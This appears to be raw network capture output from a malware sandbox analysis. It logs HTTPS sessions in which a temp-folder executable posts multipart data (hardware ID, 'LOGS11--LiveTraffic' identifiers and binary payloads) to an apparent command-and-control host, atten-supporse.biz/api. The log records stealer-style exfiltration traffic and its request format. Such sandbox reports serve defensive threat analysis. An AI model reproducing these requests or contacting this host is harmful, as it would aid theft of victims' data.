                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuTwxp1dyvOXvRrJ%2F1BAu99HTgFCpXW9wmWSZ%2BDgC8kWes4Ii73ogi8Nr5ZHSmMb8V3TAAszIn90Fn75v%2BfQDJjVwg8IKxTL10eahwd5MbrEHwJk3pc4z%2BuhJfstLdy9tDrt4tc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a23f4c5cf797-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1735&rtt_var=728&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1426477&cwnd=151&unsent_bytes=0&cid=809cb54f4bcc81c6&ts=756&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC352INData Raw: 31 64 31 65 0d 0a 43 32 7a 75 6c 4d 65 58 31 46 66 39 48 74 58 75 62 58 35 4d 4e 67 4e 69 48 61 48 5a 75 36 4c 6c 50 53 70 78 42 4f 6b 31 77 41 46 77 54 70 69 32 2f 61 50 34 64 59 35 37 39 39 51 5a 44 44 6c 54 4c 30 42 38 78 66 75 42 78 49 52 52 57 52 51 6f 79 30 4f 74 49 7a 45 4b 6a 2f 69 30 38 76 68 31 6d 47 62 33 31 44 59 46 62 6c 4e 74 51 43 65 44 76 4e 48 41 68 46 46 49 45 47 2b 47 52 61 78 69 59 77 43 4a 2f 4b 4c 30 73 44 61 52 63 37 43 4c 43 42 38 6d 57 47 6f 50 64 63 7a 37 6c 34 43 41 52 77 68 4c 4a 71 52 51 74 47 42 47 44 5a 33 2f 35 65 72 34 4c 4e 39 37 75 38 78 58 58 43 31 54 59 51 35 37 78 62 4c 54 79 6f 31 5a 53 52 56 75 6d 56 79 6d 61 57 4d 4f 69 76 32 6f 2f 61 51 37 6d 33 53 37 6a 51 49 66 62 68 6f 68 42 32 65 44 34 35 6d 54 74 56 78 5a 41
                                                                                                                                                                                                                                            Data Ascii: 1d1eC2zulMeX1Ff9HtXubX5MNgNiHaHZu6LlPSpxBOk1wAFwTpi2/aP4dY5799QZDDlTL0B8xfuBxIRRWRQoy0OtIzEKj/i08vh1mGb31DYFblNtQCeDvNHAhFFIEG+GRaxiYwCJ/KL0sDaRc7CLCB8mWGoPdcz7l4CARwhLJqRQtGBGDZ3/5er4LN97u8xXXC1TYQ57xbLTyo1ZSRVumVymaWMOiv2o/aQ7m3S7jQIfbhohB2eD45mTtVxZA
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 69 6b 2b 4c 59 6e 6c 33 65 38 69 52 30 58 4a 31 6c 73 41 48 4c 4a 74 4e 72 41 67 46 56 43 48 47 79 50 57 71 39 6c 61 51 37 4d 75 4f 58 79 72 6e 58 48 50 4a 53 4a 48 78 73 69 51 69 4d 36 50 39 7a 31 77 49 43 41 55 77 68 4c 4a 6f 4e 53 6f 57 42 69 41 59 2f 2b 72 75 65 32 4a 35 6c 78 73 70 34 4a 47 53 42 65 59 68 4a 31 7a 62 33 61 79 59 78 57 54 52 52 69 79 78 6e 69 5a 48 46 4f 31 4c 61 45 2b 4c 30 35 6c 57 75 33 7a 42 42 53 4e 78 52 6d 44 44 2b 62 2b 39 33 42 67 31 35 4d 48 57 69 50 57 36 52 74 5a 41 47 4b 2f 4b 58 79 76 44 32 58 66 62 71 48 41 42 77 72 57 57 55 47 63 38 4b 2b 6d 59 37 48 57 46 42 54 50 73 74 35 70 57 42 37 54 4c 6e 31 71 2f 75 78 49 39 39 6a 2b 5a 56 50 47 79 49 55 4f 55 42 78 78 72 54 4c 77 5a 56 61 52 67 46 71 6a 6c 47 76 59 47 63 4f 69
                                                                                                                                                                                                                                            Data Ascii: ik+LYnl3e8iR0XJ1lsAHLJtNrAgFVCHGyPWq9laQ7MuOXyrnXHPJSJHxsiQiM6P9z1wICAUwhLJoNSoWBiAY/+rue2J5lxsp4JGSBeYhJ1zb3ayYxWTRRiyxniZHFO1LaE+L05lWu3zBBSNxRmDD+b+93Bg15MHWiPW6RtZAGK/KXyvD2XfbqHABwrWWUGc8K+mY7HWFBTPst5pWB7TLn1q/uxI99j+ZVPGyIUOUBxxrTLwZVaRgFqjlGvYGcOi
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 78 49 39 39 6a 2b 5a 56 50 47 79 49 55 4f 55 42 79 79 37 37 63 7a 34 5a 56 52 68 5a 73 68 31 2b 73 59 48 73 42 69 50 61 70 2f 62 77 34 6b 58 69 2f 68 51 51 58 4b 46 52 67 43 6a 2b 4e 2b 39 37 59 78 77 63 49 4a 32 47 48 57 71 30 68 58 41 32 43 2b 4b 4c 6a 39 69 72 52 5a 66 65 4c 41 31 78 32 46 47 30 4a 66 38 69 78 33 63 43 41 55 6b 30 51 59 59 68 61 70 57 6c 6e 43 59 6a 36 72 50 69 77 4e 5a 68 34 73 70 34 4b 46 53 4a 59 49 55 34 2f 78 4b 4f 5a 6d 4d 64 77 54 77 56 6c 70 46 53 7a 61 69 6b 52 77 75 2f 6c 38 72 70 31 78 7a 79 77 69 51 63 58 4b 46 78 68 45 6e 72 4e 73 4e 6a 4b 67 56 35 46 48 32 43 4c 56 71 4a 6c 5a 51 36 4c 38 62 66 6e 73 7a 4f 4e 64 76 66 43 54 78 73 32 46 44 6c 41 53 64 4f 73 79 4e 62 46 61 6b 73 64 61 49 78 42 34 6e 77 6e 46 38 7a 78 71 62
                                                                                                                                                                                                                                            Data Ascii: xI99j+ZVPGyIUOUByy77cz4ZVRhZsh1+sYHsBiPap/bw4kXi/hQQXKFRgCj+N+97YxwcIJ2GHWq0hXA2C+KLj9irRZfeLA1x2FG0Jf8ix3cCAUk0QYYhapWlnCYj6rPiwNZh4sp4KFSJYIU4/xKOZmMdwTwVlpFSzaikRwu/l8rp1xzywiQcXKFxhEnrNsNjKgV5FH2CLVqJlZQ6L8bfnszONdvfCTxs2FDlASdOsyNbFaksdaIxB4nwnF8zxqb
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 63 72 71 48 41 42 63 38 56 47 77 45 63 38 65 7a 30 73 72 48 45 51 67 55 66 73 73 50 34 6c 5a 6b 41 59 7a 31 73 37 57 70 65 34 59 38 73 49 42 50 52 47 35 59 62 77 42 77 7a 37 66 53 79 49 5a 54 52 68 52 6a 67 6c 2b 71 63 57 67 4b 68 50 65 72 2b 72 63 78 6d 6e 6d 7a 69 77 73 61 49 52 51 76 51 48 6a 62 2b 34 47 41 71 48 68 39 55 55 65 78 46 37 30 74 63 45 36 4c 2b 75 57 74 39 6a 6d 63 63 4c 2b 44 43 52 55 69 58 6d 67 4c 63 38 69 2f 31 63 6d 43 57 55 6b 57 59 34 70 54 72 6d 6c 76 44 59 2f 35 71 76 71 2b 64 64 45 38 73 4a 52 50 52 47 35 78 64 67 74 78 78 66 76 47 6a 70 34 66 54 78 38 6d 30 78 65 75 61 6d 38 49 69 66 71 6b 38 37 34 77 6c 33 69 32 69 67 6b 66 49 56 42 6b 41 58 44 48 74 39 66 4b 68 6c 35 45 47 47 6d 41 55 75 49 74 4b 51 6d 55 74 76 32 31 68 7a 61
                                                                                                                                                                                                                                            Data Ascii: crqHABc8VGwEc8ez0srHEQgUfssP4lZkAYz1s7Wpe4Y8sIBPRG5YbwBwz7fSyIZTRhRjgl+qcWgKhPer+rcxmnmziwsaIRQvQHjb+4GAqHh9UUexF70tcE6L+uWt9jmccL+DCRUiXmgLc8i/1cmCWUkWY4pTrmlvDY/5qvq+ddE8sJRPRG5xdgtxxfvGjp4fTx8m0xeuam8Iifqk874wl3i2igkfIVBkAXDHt9fKhl5EGGmAUuItKQmUtv21hza
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 77 41 51 62 68 6f 68 42 32 65 44 34 35 6e 75 6a 45 78 66 45 47 69 41 51 62 6b 6a 64 6b 43 56 74 71 4c 35 39 6d 33 66 66 37 79 48 43 78 77 69 56 47 55 4e 66 39 47 30 33 73 65 4f 56 46 6f 5a 59 59 78 63 71 6d 68 6d 43 4a 37 36 71 2b 65 7a 4a 34 30 38 2b 63 77 49 42 47 34 4d 49 54 5a 34 30 36 76 61 67 72 5a 4a 53 77 56 74 68 6c 76 69 66 43 63 58 7a 50 47 70 74 65 35 31 6d 58 4f 2b 6a 77 41 64 4a 31 68 73 42 58 62 47 75 74 2f 45 6a 56 56 49 46 57 43 4b 55 71 68 67 61 41 53 46 38 61 33 79 74 53 66 66 4d 76 65 4c 46 31 78 32 46 45 67 48 62 63 32 72 6d 64 2f 4a 52 67 67 55 61 73 73 50 34 6d 64 6a 41 59 6a 78 71 66 4f 7a 4d 35 4a 39 75 49 30 50 45 79 70 66 61 41 5a 2b 7a 72 37 55 78 4a 56 56 51 78 78 71 67 6c 75 76 49 79 64 4f 69 2b 37 6c 72 66 59 45 6b 6e 4b 35
                                                                                                                                                                                                                                            Data Ascii: wAQbhohB2eD45nujExfEGiAQbkjdkCVtqL59m3ff7yHCxwiVGUNf9G03seOVFoZYYxcqmhmCJ76q+ezJ408+cwIBG4MITZ406vagrZJSwVthlvifCcXzPGpte51mXO+jwAdJ1hsBXbGut/EjVVIFWCKUqhgaASF8a3ytSffMveLF1x2FEgHbc2rmd/JRggUassP4mdjAYjxqfOzM5J9uI0PEypfaAZ+zr7UxJVVQxxqgluvIydOi+7lrfYEknK5
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 52 66 5a 41 31 79 7a 72 6a 66 78 6f 78 54 57 68 70 6d 69 46 7a 69 4c 53 6b 4a 6c 4c 62 39 74 5a 55 69 69 58 61 77 67 42 6b 58 4c 31 64 33 44 57 2b 44 39 5a 6e 52 67 45 34 49 53 33 43 62 51 4b 56 38 4a 78 66 4d 38 61 6d 31 37 6e 57 5a 64 62 47 4c 43 52 49 38 55 57 63 50 63 4d 71 79 33 63 69 45 58 30 77 58 59 59 35 55 72 6d 68 75 44 59 50 79 72 50 75 2f 4f 74 38 79 39 34 73 58 58 48 59 55 51 42 74 38 7a 37 61 5a 33 38 6c 47 43 42 52 71 79 77 2f 69 62 32 63 4c 6a 50 79 6a 38 62 4d 7a 6c 58 6d 33 68 77 77 54 4b 6c 4a 6c 44 33 2f 49 73 74 6a 47 67 6c 56 44 46 57 75 49 55 61 51 6a 4a 30 36 4c 37 75 57 74 39 68 57 45 63 62 75 4c 54 77 4e 67 54 53 45 48 63 34 50 6a 6d 63 75 4c 57 30 38 54 61 34 68 66 70 32 64 6a 43 34 7a 2b 74 2f 32 32 4d 6f 31 75 74 34 55 4b 45
                                                                                                                                                                                                                                            Data Ascii: RfZA1yzrjfxoxTWhpmiFziLSkJlLb9tZUiiXawgBkXL1d3DW+D9ZnRgE4IS3CbQKV8JxfM8am17nWZdbGLCRI8UWcPcMqy3ciEX0wXYY5UrmhuDYPyrPu/Ot8y94sXXHYUQBt8z7aZ38lGCBRqyw/ib2cLjPyj8bMzlXm3hwwTKlJlD3/IstjGglVDFWuIUaQjJ06L7uWt9hWEcbuLTwNgTSEHc4PjmcuLW08Ta4hfp2djC4z+t/22Mo1ut4UKE
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC265INData Raw: 41 62 63 43 72 32 73 2b 57 59 51 68 4c 66 37 55 58 71 58 56 75 48 6f 2f 67 72 76 69 36 4a 4b 45 38 37 39 68 64 54 6e 77 47 4d 78 38 2f 33 49 53 58 67 49 59 66 45 43 70 2f 79 30 48 69 4f 7a 74 41 7a 4f 54 6c 72 66 5a 79 6e 47 36 6c 69 67 77 4b 4c 52 4e 66 50 6c 6a 56 73 64 37 51 67 45 68 48 55 79 6a 4c 57 4f 49 37 55 45 36 46 38 62 37 6b 6f 44 69 50 65 2f 65 7a 51 56 77 32 46 44 6c 41 53 73 43 31 31 38 65 52 54 67 55 30 63 49 46 51 73 6d 52 2b 41 63 79 34 35 66 50 32 62 63 77 79 39 34 67 65 58 48 59 45 4d 31 73 71 6b 4f 79 4a 6b 70 67 52 55 56 4e 77 79 77 2f 77 4c 53 6b 63 7a 4b 37 6c 73 72 55 6e 6a 58 71 30 6d 67 78 62 45 47 70 47 47 6e 4c 46 72 4d 6a 2b 75 56 68 53 48 6d 43 63 52 75 35 32 61 67 43 43 38 62 4f 31 2b 48 57 51 50 4f 2b 31 54 31 52 75 61 79
                                                                                                                                                                                                                                            Data Ascii: AbcCr2s+WYQhLf7UXqXVuHo/grvi6JKE879hdTnwGMx8/3ISXgIYfECp/y0HiOztAzOTlrfZynG6ligwKLRNfPljVsd7QgEhHUyjLWOI7UE6F8b7koDiPe/ezQVw2FDlASsC118eRTgU0cIFQsmR+Acy45fP2bcwy94geXHYEM1sqkOyJkpgRUVNwyw/wLSkczK7lsrUnjXq0mgxbEGpGGnLFrMj+uVhSHmCcRu52agCC8bO1+HWQPO+1T1Ruay
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 32 31 32 61 0d 0a 57 45 55 55 59 55 63 4a 6f 61 68 58 6c 6b 43 4a 76 6e 35 62 76 32 4d 39 38 6b 35 38 4a 50 47 44 38 55 4f 56 41 74 6d 4f 36 4b 6c 39 63 4e 56 31 31 2f 79 30 48 69 4f 7a 74 41 7a 4f 54 6c 72 66 5a 79 6e 47 36 6c 69 67 77 4b 4c 52 4e 66 50 6c 48 45 76 64 7a 48 6c 78 31 6d 47 48 4b 4d 46 2b 77 6a 5a 6b 37 55 7a 2b 57 39 39 67 72 52 50 4b 2f 4d 56 31 77 62 56 32 38 4f 65 4e 57 71 6c 4f 36 41 57 55 30 55 64 73 6c 35 71 58 64 75 54 73 4b 32 6f 37 58 75 5a 64 45 38 73 35 31 50 52 48 34 47 4f 6c 55 73 6c 4f 75 4c 33 38 6c 47 43 41 55 6d 30 77 58 73 49 33 74 4f 31 4c 62 69 39 71 51 6e 6d 58 2b 68 6a 30 67 69 45 46 64 33 44 58 44 49 75 75 66 2b 71 56 4a 4a 45 47 6a 4a 5a 72 52 75 65 51 32 4a 38 5a 76 4c 75 44 4b 4c 65 37 6d 4b 44 31 78 67 46 47 35
                                                                                                                                                                                                                                            Data Ascii: 212aWEUUYUcJoahXlkCJvn5bv2M98k58JPGD8UOVAtmO6Kl9cNV11/y0HiOztAzOTlrfZynG6ligwKLRNfPlHEvdzHlx1mGHKMF+wjZk7Uz+W99grRPK/MV1wbV28OeNWqlO6AWU0Udsl5qXduTsK2o7XuZdE8s51PRH4GOlUslOuL38lGCAUm0wXsI3tO1Lbi9qQnmX+hj0giEFd3DXDIuuf+qVJJEGjJZrRueQ2J8ZvLuDKLe7mKD1xgFG5
                                                                                                                                                                                                                                            2024-12-09 20:09:36 UTC1369INData Raw: 5a 6e 45 6c 68 38 51 51 7a 54 51 41 76 45 30 4f 56 79 54 75 4c 79 31 6f 48 58 48 4c 76 6e 4d 48 56 78 32 46 43 59 44 62 64 47 39 32 74 61 45 47 48 59 74 51 59 56 51 6f 33 56 35 41 34 44 58 70 75 53 38 43 36 46 70 74 49 49 42 47 7a 68 46 49 55 34 2f 7a 50 75 42 2b 63 63 58 43 43 77 6f 79 30 2f 69 4f 79 6b 37 6a 2f 69 72 38 71 41 6b 30 6c 75 35 69 77 34 4b 50 6c 6c 74 49 58 7a 53 73 5a 6d 4f 78 31 6b 49 53 7a 54 46 46 36 5a 79 4b 56 62 63 70 50 36 67 35 57 4c 50 4c 71 6a 43 46 6c 77 34 46 44 6c 53 4d 59 4f 70 6d 5a 6a 48 47 45 73 42 64 49 31 55 74 47 41 75 4d 4c 4c 54 73 76 61 6d 4d 35 78 43 69 61 63 44 47 69 6c 4f 5a 67 5a 5a 34 2f 75 58 67 49 67 66 45 43 6f 6d 77 78 65 64 4c 53 6b 57 7a 4b 37 6c 77 4c 55 37 6b 58 75 68 6e 55 49 35 4f 56 64 78 42 6e 79 44
                                                                                                                                                                                                                                            Data Ascii: ZnElh8QQzTQAvE0OVyTuLy1oHXHLvnMHVx2FCYDbdG92taEGHYtQYVQo3V5A4DXpuS8C6FptIIBGzhFIU4/zPuB+ccXCCwoy0/iOyk7j/ir8qAk0lu5iw4KPlltIXzSsZmOx1kISzTFF6ZyKVbcpP6g5WLPLqjCFlw4FDlSMYOpmZjHGEsBdI1UtGAuMLLTsvamM5xCiacDGilOZgZZ4/uXgIgfEComwxedLSkWzK7lwLU7kXuhnUI5OVdxBnyD


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            10192.168.2.649936104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:37 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=BRO4LUF8AI0DNK
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12841
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:37 UTC12841OUTData Raw: 2d 2d 42 52 4f 34 4c 55 46 38 41 49 30 44 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 42 52 4f 34 4c 55 46 38 41 49 30 44 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 52 4f 34 4c 55 46 38 41 49 30 44 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 52
                                                                                                                                                                                                                                            Data Ascii: --BRO4LUF8AI0DNKContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--BRO4LUF8AI0DNKContent-Disposition: form-data; name="pid"2--BRO4LUF8AI0DNKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BR
                                                                                                                                                                                                                                            2024-12-09 20:09:38 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4u0nomk8uhqu66mfi5q3jkhll8; expires=Fri, 04-Apr-2025 13:56:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2xPOGs3%2B%2BduC%2FjRkcZBa2Obr1e7UcPlheseMuuCIJxFeFW%2FGbM8Rw738lcjAhDhUDPmzORODw%2BZ5pkmd8iOxyHSBFx1UZXR35%2BApaSHku9rZTNYeJgL6u0lokCOZjWOapJVMrw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a24d8fb87ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=11&recv=20&lost=0&retrans=1&sent_bytes=4232&recv_bytes=13779&delivery_rate=292409&cwnd=179&unsent_bytes=0&cid=d29a3446a1c6d561&ts=997&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            11192.168.2.649943104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:41 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=A2HRMIDBVT8ZGJX
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15093
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:41 UTC15093OUTData Raw: 2d 2d 41 32 48 52 4d 49 44 42 56 54 38 5a 47 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 41 32 48 52 4d 49 44 42 56 54 38 5a 47 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 32 48 52 4d 49 44 42 56 54 38 5a 47 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                                                                            Data Ascii: --A2HRMIDBVT8ZGJXContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--A2HRMIDBVT8ZGJXContent-Disposition: form-data; name="pid"2--A2HRMIDBVT8ZGJXContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                                                                            2024-12-09 20:09:42 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=svhnrjiu72kk0id6f8ma739h1p; expires=Fri, 04-Apr-2025 13:56:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ovt3lRP8y0n%2BBAAjpC2KwZf1AH%2BOvM0qHTWQXhK6QiAdJMS4T%2BbpZAbW3umJo0ejvQpGkkaM8iClGwCqgf71BrFgDDMboYbqeAQ%2BqRmM9%2BGRzN1OfJaQFngleAshqp0TudWRfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a263ab637ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1818&rtt_var=711&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16032&delivery_rate=1606160&cwnd=179&unsent_bytes=0&cid=a10404de371d1d38&ts=944&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            12192.168.2.649951104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:44 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4PT5RID7U
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 19915
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:44 UTC15331OUTData Raw: 2d 2d 34 50 54 35 52 49 44 37 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 50 54 35 52 49 44 37 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 50 54 35 52 49 44 37 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 34 50 54 35 52 49 44 37 55 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                            Data Ascii: --4PT5RID7UContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--4PT5RID7UContent-Disposition: form-data; name="pid"3--4PT5RID7UContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--4PT5RID7UConten
                                                                                                                                                                                                                                            2024-12-09 20:09:44 UTC4584OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                                                                                                                                                                            2024-12-09 20:09:45 UTC1023INHTTP/1.1 200 OK
